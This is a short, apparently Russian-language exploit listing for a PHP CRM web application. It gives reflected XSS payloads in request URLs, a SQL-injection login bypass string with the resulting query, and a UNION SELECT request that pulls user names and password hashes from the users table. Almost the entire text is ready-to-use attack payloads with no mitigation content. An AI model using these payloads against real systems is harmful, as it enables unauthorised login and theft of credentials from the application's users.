1) XSS
/index.php?action=DetailView&module=Leads&record=%3Cscript%3Ealert('document.cookie')%3C/script%3E
/index.php/%22%3E%3Cscript%3Ealert('xss')%3C/script%3E/?[params]
2) SQL-injection
a) Инъекция возможно при условии, что magic_quotes_gpc off. Атакующий может войти без пароля, сформировав такой запрос в форме аутентификации:
«foo' or '%'='»
Запрос к базе будет выглядеть так:
SELECT *
FROM users
WHERE user_name='admin'
OR '%'='%'
AND user_password='adAZ2jidC3H1M'
b) /?ticket_title=&contact_name=&priority=&status=&action=index&query=true&m
odule=HelpDesk&order_by=&sorder=ASC&viewname=0&button=Search&category=&da
te_crit=is&date=%27+UNION+SELECT+56%2CCONCAT%28user_name%2C+%22%3A%22%2C+
user_password%29%2C+%22Open%22%2C%22Normal%22%2C1%2C1%2C1%2C1%2C1%2C1%2C1
%2C1+from+users+where+users.user_name+LIKE+%27